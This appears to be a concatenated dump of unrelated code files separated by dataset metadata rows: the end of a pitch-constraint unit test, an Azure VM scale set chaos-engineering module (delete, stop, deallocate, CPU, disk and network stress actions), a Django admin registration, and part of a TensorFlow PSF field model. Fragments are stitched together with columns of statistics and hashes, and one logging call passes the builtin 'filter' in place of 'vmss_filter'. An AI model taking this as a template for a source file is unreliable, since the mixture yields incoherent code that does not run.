logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 10
for pitch in pitches:
assert pitch.chromatic_distance < DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} => {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test GREATER_THAN: solutions must lie above F#:5
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_THAN)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 4
for pitch in pitches:
assert pitch.chromatic_distance > DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} <= {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test LESS_EQUAL: solutions must lie at or below F#:5
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_EQUAL)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 11
for pitch in pitches:
assert pitch.chromatic_distance <= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} > {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test GREATER_EQUAL: solutions must lie at or above F#:5
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_EQUAL)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 5
for pitch in pitches:
assert pitch.chromatic_distance >= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} < {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.EQUAL)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 1
for pitch in pitches:
assert pitch.chromatic_distance == DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} != {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
logging.debug('End test_comparative_reversal')
@staticmethod
def policy_creator(modality_type, modality_tone, tertian_chord_txt, low_pitch_txt, hi_pitch_txt):
diatonic_tonality = Tonality.create(modality_type, modality_tone)
chord = TertianChordTemplate.parse(tertian_chord_txt).create_chord(diatonic_tonality)
hc = HarmonicContext(diatonic_tonality, chord, Duration(1, 2))
pitch_range = PitchRange(DiatonicPitch.parse(low_pitch_txt).chromatic_distance,
DiatonicPitch.parse(hi_pitch_txt).chromatic_distance)
return PolicyContext(hc, pitch_range)
if __name__ == "__main__":
unittest.main()
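# To run this module directly (assuming the repository root is on PYTHONPATH):
#
#     python -m unittest tests.melody_tests.constraints_tests.test_comparative_pitch_constraint -v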
| 41.096886
| 123
| 0.619685
| 1,338
| 11,877
| 5.299701
| 0.090433
| 0.04823
| 0.085742
| 0.090255
| 0.809618
| 0.802567
| 0.797208
| 0.789874
| 0.777887
| 0.777887
| 0
| 0.018346
| 0.284078
| 11,877
| 288
| 124
| 41.239583
| 0.815595
| 0.023912
| 0
| 0.804762
| 0
| 0
| 0.044485
| 0.004319
| 0
| 0
| 0
| 0
| 0.190476
| 1
| 0.014286
| false
| 0
| 0.07619
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f29d692eb07a6ba8a3b1312fc01cd356a1bdcfa
| 20,165
|
py
|
Python
|
pdchaosazure/vmss/actions.py
|
proofdock/chaos-azure
|
85302f8be18153862656c587988eafb5dd37ddf7
|
[
"Apache-2.0"
] | 1
|
2021-04-24T20:01:54.000Z
|
2021-04-24T20:01:54.000Z
|
pdchaosazure/vmss/actions.py
|
proofdock/chaos-azure
|
85302f8be18153862656c587988eafb5dd37ddf7
|
[
"Apache-2.0"
] | 23
|
2020-05-22T06:43:14.000Z
|
2021-02-25T21:02:28.000Z
|
pdchaosazure/vmss/actions.py
|
proofdock/chaos-azure
|
85302f8be18153862656c587988eafb5dd37ddf7
|
[
"Apache-2.0"
] | null | null | null |
import concurrent.futures
from typing import Iterable, Mapping
from azure.core.exceptions import HttpResponseError
from chaoslib import Configuration, Secrets
from chaoslib.exceptions import FailedActivity
from logzero import logger
from pdchaosazure.common import cleanse, config
from pdchaosazure.common.compute import command, client
from pdchaosazure.vmss.fetcher import fetch_vmss, fetch_instances
from pdchaosazure.vmss.records import Records
__all__ = [
"burn_io", "deallocate", "delete", "fill_disk", "network_latency",
"restart", "stop", "stress_cpu"
]
def delete(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Delete instances from the VMSS.
**Be aware**: Deleting a VMSS instance is an invasive action.
You will not be able to recover the VMSS instance once you have deleted it.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', filter='{}'".format(delete.__name__, configuration, vmss_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
try:
poller = clnt.virtual_machine_scale_set_vms.begin_delete(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(__long_poll, delete.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def restart(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Restart instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}'".format(
restart.__name__, configuration, vmss_filter, instance_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
try:
poller = clnt.virtual_machine_scale_set_vms.begin_restart(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(__long_poll, restart.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def stop(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Stop instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}'".format(
stop.__name__, configuration, vmss_filter, instance_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
try:
poller = clnt.virtual_machine_scale_set_vms.begin_power_off(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(__long_poll, stop.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def deallocate(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Deallocate instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}'".format(
deallocate.__name__, configuration, vmss_filter, instance_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
logger.debug("Deallocating instance: {}".format(instance['name']))
try:
poller = clnt.virtual_machine_scale_set_vms.begin_deallocate(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(
__long_poll, deallocate.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
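def _demo_lifecycle_action():
    # A hypothetical sketch (not part of the original module) of calling one of
    # the lifecycle actions above directly. The KQL filter strings are
    # placeholders, and in a chaostoolkit experiment `configuration` and
    # `secrets` would be injected by the runner rather than passed by hand.
    return deallocate(
        vmss_filter="where resourceGroup == 'rg-chaos'",  # placeholder filter
        instance_filter="sample 1",                       # placeholder filter
        configuration=None,
        secrets=None,
    )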
def stress_cpu(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 120,
configuration: Configuration = None,
secrets: Secrets = None):
"""Stress CPU up to 100% for instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates high CPU usage. Defaults to 120 seconds.
"""
operation_name = stress_cpu.__name__
logger.debug("Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}', duration='{}'".format(
operation_name, configuration, vmss_filter, instance_filter, duration))
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
clnt = client.init()
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
parameters = command.fill_parameters(command_id, script_content, duration=duration)
# collect future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for future results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def burn_io(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 60,
path: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Simulate heavy disk I/O operations.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates high disk I/O operations. Defaults to 60 seconds.
path : str, optional
The absolute path to write the stress file into. Defaults to ``C:\\burn`` for Windows
clients and ``/root/burn`` for Linux clients.
"""
operation_name = burn_io.__name__
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}', duration='{}',".format(
operation_name, configuration, vmss_filter, instance_filter, duration))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
fill_path = command.prepare_path(instance, path)
parameters = command.fill_parameters(command_id, script_content, duration=duration, path=fill_path)
# collect future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for the results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def fill_disk(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 120,
size: int = 1000,
path: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Fill the disk with random data.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates random data on disk. Defaults to 120 seconds.
size : int, optional
Size of the stressing file that is generated in Megabytes. Defaults to 1000 MB.
path : str, optional
Location of the stressing file where it is generated. Defaults to ``/root/burn`` on Linux systems
and ``C:\\burn`` on Windows machines.
"""
operation_name = fill_disk.__name__
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}', "
"duration='{}', size='{}', path='{}'".format(
operation_name, configuration, vmss_filter, instance_filter, duration, size, path))
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
clnt = client.init()
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
fill_path = command.prepare_path(instance, path)
parameters = command.fill_parameters(
command_id, script_content, duration=duration, size=size, path=fill_path)
# collect the future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for the results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def network_latency(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 60,
delay: int = 200,
jitter: int = 50,
network_interface: str = "eth0",
configuration: Configuration = None,
secrets: Secrets = None):
"""Increase the response time on instances.
**Please note**: This action is available only for Linux-based systems.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted, a random VMSS from your subscription is selected.
instance_filter : str, optional
KQL: Filter the instances of the selected virtual machine scale set(s). If omitted,
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates network latency. Defaults to 60 seconds.
delay : int, optional
Applied delay of the response time in milliseconds. Defaults to 200 milliseconds.
jitter : int, optional
Applied variance of +/- jitter to the delay of the response time in milliseconds. Defaults to 50 milliseconds.
network_interface : str, optional
The network interface where the network latency is applied to. Defaults to local ethernet eth0.
"""
operation_name = network_latency.__name__
logger.debug(
"Starting {}: configuration='{}', filter='{}', duration='{}',"
" delay='{}', jitter='{}', network_interface='{}'".format(
operation_name, configuration, filter, duration, delay, jitter, network_interface))
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
clnt = client.init()
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
parameters = command.fill_parameters(
command_id, script_content, duration=duration, delay=delay, jitter=jitter,
network_interface=network_interface)
# collect the future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for the results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
###########################
# PRIVATE HELPER FUNCTIONS
###########################
def __long_poll(activity, instance, poller, configuration):
logger.debug("Waiting for operation '{}' on instance '{}' to finish. Giving priority to other operations.".format(
activity, instance['name']))
poller.result(config.load_timeout(configuration))
logger.debug("Finished operation '{}' on instance '{}'.".format(activity, instance['name']))
return instance
def __long_poll_command(activity, group, instance, parameters, client):
logger.debug("Waiting for operation '{}' on instance '{}' to finish. Giving priority to other operations.".format(
activity, instance['name']))
command.run(group, instance, parameters, client)
logger.debug("Finished operation '{}' on instance '{}'.".format(activity, instance['name']))
return instance
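def _demo_script_action():
    # A hypothetical sketch (not part of the original module) of calling a
    # script-based action; the parameter values mirror the documented defaults
    # and the filter string is a placeholder.
    return network_latency(
        vmss_filter="where resourceGroup == 'rg-chaos'",  # placeholder filter
        duration=60,
        delay=200,
        jitter=50,
        network_interface="eth0",
        configuration=None,
        secrets=None,
    )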
| 40.009921
| 118
| 0.64369
| 2,173
| 20,165
| 5.796595
| 0.0948
| 0.029374
| 0.030168
| 0.034932
| 0.834868
| 0.832566
| 0.817879
| 0.809305
| 0.808034
| 0.782868
| 0
| 0.0029
| 0.264567
| 20,165
| 503
| 119
| 40.089463
| 0.84646
| 0.239623
| 0
| 0.774908
| 0
| 0
| 0.093094
| 0.005722
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0369
| false
| 0
| 0.0369
| 0
| 0.110701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56cc369f63491d423777cb8420ec89165c2fb46d
| 197
|
py
|
Python
|
mmb_repo/mmb_data/admin.py
|
ajay2611/mmb
|
af8756fec0eab0facf7f7fa29f81157de8dec7b5
|
[
"BSD-3-Clause"
] | 2
|
2017-11-10T09:12:28.000Z
|
2018-05-27T00:07:19.000Z
|
mmb_repo/mmb_data/admin.py
|
ajay2611/mmb
|
af8756fec0eab0facf7f7fa29f81157de8dec7b5
|
[
"BSD-3-Clause"
] | 1
|
2015-11-02T06:03:18.000Z
|
2015-11-02T06:03:18.000Z
|
mmb_repo/mmb_data/admin.py
|
ajay2611/mmb
|
af8756fec0eab0facf7f7fa29f81157de8dec7b5
|
[
"BSD-3-Clause"
] | 1
|
2018-04-10T07:11:07.000Z
|
2018-04-10T07:11:07.000Z
|
from django.contrib import admin
from .models import Genre, Instrument, Song
admin.site.register(Genre)
admin.site.register(Instrument)
admin.site.register(Song)
# admin.site.register(Followers)
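Should per-model configuration be needed later, a hedged variant registers a ModelAdmin subclass instead of the bare model; the `name` field used in list_display is an assumption about the Song model, not taken from the source.
from django.contrib import admin
from .models import Song

@admin.register(Song)
class SongAdmin(admin.ModelAdmin):
    list_display = ('name',)  # hypothetical field; adjust to the actual Song model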
| 21.888889
| 43
| 0.807107
| 27
| 197
| 5.888889
| 0.444444
| 0.226415
| 0.427673
| 0.264151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086294
| 197
| 8
| 44
| 24.625
| 0.883333
| 0.152284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
56e3a52e31f9399f286aec51564457e091a4d63e
| 14,114
|
py
|
Python
|
wf_psf/tf_alt_psf_models.py
|
tobias-liaudat/wf-psf
|
0ff1a12d06c46bd8599061d227785393fb528d76
|
[
"MIT"
] | 7
|
2022-03-10T10:49:01.000Z
|
2022-03-17T16:06:12.000Z
|
wf_psf/tf_alt_psf_models.py
|
tobias-liaudat/wf-psf
|
0ff1a12d06c46bd8599061d227785393fb528d76
|
[
"MIT"
] | null | null | null |
wf_psf/tf_alt_psf_models.py
|
tobias-liaudat/wf-psf
|
0ff1a12d06c46bd8599061d227785393fb528d76
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
from wf_psf.tf_layers import TF_poly_Z_field, TF_zernike_OPD, TF_batch_poly_PSF
from wf_psf.tf_layers import TF_NP_poly_OPD, TF_batch_mono_PSF
class TF_SemiParam_field_l2_OPD(tf.keras.Model):
""" PSF field forward model!
Semi parametric model based on the Zernike polynomial basis. The
Parameters
----------
zernike_maps: Tensor(n_batch, opd_dim, opd_dim)
Zernike polynomial maps.
obscurations: Tensor(opd_dim, opd_dim)
Predefined obscurations of the phase.
batch_size: int
        Batch size.
output_Q: float
        Oversampling used. This should match the oversampling Q used to generate
        the diffraction zero padding found in the input `packed_SEDs`; we call
        that value the `input_Q`. When the two match, the original sampling of
        the model used to calculate the input `packed_SEDs` is replicated.
        The final oversampling of the generated PSFs with respect to the
        original instrument sampling depends on the ratio `input_Q/output_Q`.
        Using `output_Q < 1` is not recommended, and although float values work,
        integer values are preferred.
d_max_nonparam: int
Maximum degree of the polynomial for the non-parametric variations.
l2_param: float
Parameter going with the l2 loss on the opd.
output_dim: int
Output dimension of the PSF stamps.
n_zernikes: int
Order of the Zernike polynomial for the parametric model.
d_max: int
Maximum degree of the polynomial for the Zernike coefficient variations.
x_lims: [float, float]
Limits for the x coordinate of the PSF field.
y_lims: [float, float]
        Limits for the y coordinate of the PSF field.
coeff_mat: Tensor or None
Initialization of the coefficient matrix defining the parametric psf
field model.
"""
def __init__(
self,
zernike_maps,
obscurations,
batch_size,
output_Q,
d_max_nonparam=3,
l2_param=1e-11,
output_dim=64,
n_zernikes=45,
d_max=2,
x_lims=[0, 1e3],
y_lims=[0, 1e3],
coeff_mat=None,
name='TF_SemiParam_field_l2_OPD'
):
super(TF_SemiParam_field_l2_OPD, self).__init__()
# Inputs: oversampling used
self.output_Q = output_Q
# Inputs: TF_poly_Z_field
self.n_zernikes = n_zernikes
self.d_max = d_max
self.x_lims = x_lims
self.y_lims = y_lims
# Inputs: TF_NP_poly_OPD
self.d_max_nonparam = d_max_nonparam
self.opd_dim = tf.shape(zernike_maps)[1].numpy()
# Inputs: TF_zernike_OPD
# They are not stored as they are memory-heavy
# zernike_maps =[]
# Inputs: TF_batch_poly_PSF
self.batch_size = batch_size
self.obscurations = obscurations
self.output_dim = output_dim
# Inputs: Loss
self.l2_param = l2_param
# Initialize the first layer
self.tf_poly_Z_field = TF_poly_Z_field(
x_lims=self.x_lims, y_lims=self.y_lims, n_zernikes=self.n_zernikes, d_max=self.d_max
)
# Initialize the zernike to OPD layer
self.tf_zernike_OPD = TF_zernike_OPD(zernike_maps=zernike_maps)
# Initialize the non-parametric layer
self.tf_np_poly_opd = TF_NP_poly_OPD(
x_lims=self.x_lims, y_lims=self.y_lims, d_max=self.d_max_nonparam, opd_dim=self.opd_dim
)
# Initialize the batch opd to batch polychromatic PSF layer
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Initialize the model parameters with non-default value
if coeff_mat is not None:
self.assign_coeff_matrix(coeff_mat)
def get_coeff_matrix(self):
""" Get coefficient matrix."""
return self.tf_poly_Z_field.get_coeff_matrix()
def assign_coeff_matrix(self, coeff_mat):
""" Assign coefficient matrix."""
self.tf_poly_Z_field.assign_coeff_matrix(coeff_mat)
def set_zero_nonparam(self):
""" Set to zero the non-parametric part."""
self.tf_np_poly_opd.set_alpha_zero()
def set_nonzero_nonparam(self):
""" Set to non-zero the non-parametric part."""
self.tf_np_poly_opd.set_alpha_identity()
def set_trainable_layers(self, param_bool=True, nonparam_bool=True):
""" Set the layers to be trainable or not."""
self.tf_np_poly_opd.trainable = nonparam_bool
self.tf_poly_Z_field.trainable = param_bool
def set_output_Q(self, output_Q, output_dim=None):
""" Set the value of the output_Q parameter.
Useful for generating/predicting PSFs at a different sampling wrt the
observation sampling.
"""
self.output_Q = output_Q
if output_dim is not None:
self.output_dim = output_dim
# Reinitialize the PSF batch poly generator
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
def predict_mono_psfs(self, input_positions, lambda_obs, phase_N):
""" Predict a set of monochromatic PSF at desired positions.
input_positions: Tensor(batch_dim x 2)
lambda_obs: float
Observed wavelength in um.
phase_N: int
Required wavefront dimension. Should be calculated with as:
``simPSF_np = wf.SimPSFToolkit(...)``
``phase_N = simPSF_np.feasible_N(lambda_obs)``
"""
# Initialise the monochromatic PSF batch calculator
tf_batch_mono_psf = TF_batch_mono_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Set the lambda_obs and the phase_N parameters
tf_batch_mono_psf.set_lambda_phaseN(phase_N, lambda_obs)
# Calculate parametric part
zernike_coeffs = self.tf_poly_Z_field(input_positions)
param_opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Calculate the non parametric part
nonparam_opd_maps = self.tf_np_poly_opd(input_positions)
# Add the estimations
opd_maps = tf.math.add(param_opd_maps, nonparam_opd_maps)
# Compute the monochromatic PSFs
mono_psf_batch = tf_batch_mono_psf(opd_maps)
return mono_psf_batch
def predict_opd(self, input_positions):
""" Predict the OPD at some positions.
Parameters
----------
input_positions: Tensor(batch_dim x 2)
Positions to predict the OPD.
Returns
-------
opd_maps : Tensor [batch x opd_dim x opd_dim]
OPD at requested positions.
"""
# Calculate parametric part
zernike_coeffs = self.tf_poly_Z_field(input_positions)
param_opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Calculate the non parametric part
nonparam_opd_maps = self.tf_np_poly_opd(input_positions)
# Add the estimations
opd_maps = tf.math.add(param_opd_maps, nonparam_opd_maps)
return opd_maps
def call(self, inputs):
"""Define the PSF field forward model.
[1] From positions to Zernike coefficients
[2] From Zernike coefficients to OPD maps
[3] From OPD maps and SED info to polychromatic PSFs
OPD: Optical Path Differences
"""
# Unpack inputs
input_positions = inputs[0]
packed_SEDs = inputs[1]
# Forward model
# Calculate parametric part
zernike_coeffs = self.tf_poly_Z_field(input_positions)
param_opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Calculate the non parametric part
nonparam_opd_maps = self.tf_np_poly_opd(input_positions)
# Add the estimations
opd_maps = tf.math.add(param_opd_maps, nonparam_opd_maps)
# Add l2 loss on the OPD
self.add_loss(self.l2_param * tf.math.reduce_sum(tf.math.square(opd_maps)))
# Compute the polychromatic PSFs
poly_psfs = self.tf_batch_poly_PSF([opd_maps, packed_SEDs])
return poly_psfs
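# Aside (not part of wf-psf): a minimal sketch of the add_loss pattern used in
# call() above, where a penalty on an intermediate tensor is added on top of
# whatever loss is configured in compile(). Layer sizes here are arbitrary.
class _L2PenaltySketch(tf.keras.Model):
    def __init__(self, l2_param=1e-11):
        super().__init__()
        self.l2_param = l2_param
        self.dense = tf.keras.layers.Dense(4)

    def call(self, inputs):
        x = self.dense(inputs)
        # Penalty computed from an intermediate tensor, as with the OPD maps above.
        self.add_loss(self.l2_param * tf.math.reduce_sum(tf.math.square(x)))
        return x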
class TF_PSF_field_model_l2_OPD(tf.keras.Model):
""" Parametric PSF field model!
Fully parametric model based on the Zernike polynomial basis.
Parameters
----------
zernike_maps: Tensor(n_batch, opd_dim, opd_dim)
Zernike polynomial maps.
obscurations: Tensor(opd_dim, opd_dim)
Predefined obscurations of the phase.
batch_size: int
Batch size
l2_param: float
Parameter going with the l2 loss on the opd.
output_dim: int
Output dimension of the PSF stamps.
